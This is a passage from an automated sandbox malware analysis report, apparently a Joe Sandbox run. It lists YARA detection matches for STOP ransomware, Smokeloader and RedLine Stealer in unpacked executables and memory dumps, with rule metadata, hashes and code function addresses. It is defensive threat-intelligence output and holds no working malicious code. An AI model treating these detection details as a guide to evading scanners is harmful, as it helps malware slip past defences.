                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000000.492089857.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.505319031.0000000000841000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000008.00000000.496174295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000007.00000002.531881974.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000009.00000000.499526693.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000002.572802544.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.503555817.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000009.00000002.533230788.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.532778418.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000009.00000000.500012370.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.575526582.0000000000851000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000002.531437946.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 0000000E.00000000.490370694.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000000.494940938.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000000.499882815.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.425983176.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000009.00000000.493912114.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000007.00000000.500354218.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 6246.exe PID: 5608, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 6246.exe PID: 1420, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\7795.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004022E90_2_004022E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004194160_2_00419416
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041BC3D0_2_0041BC3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E4F00_2_0040E4F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041995A0_2_0041995A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041064C0_2_0041064C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004146E90_2_004146E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419E9E0_2_00419E9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B400_2_00409B40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414F920_2_00414F92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041539E0_2_0041539E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414BBE0_2_00414BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004157BE0_2_004157BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C117D0_2_008C117D
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041996A4_2_0041996A
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409B504_2_00409B50
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00414BCE4_2_00414BCE
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004153AE4_2_004153AE
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041BC4D4_2_0041BC4D
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004194264_2_00419426
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0040E5004_2_0040E500
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041A5A64_2_0041A5A6
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041065C4_2_0041065C
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004146F94_2_004146F9
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004157CE4_2_004157CE
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00414FA24_2_00414FA2
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 8.0.6246.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
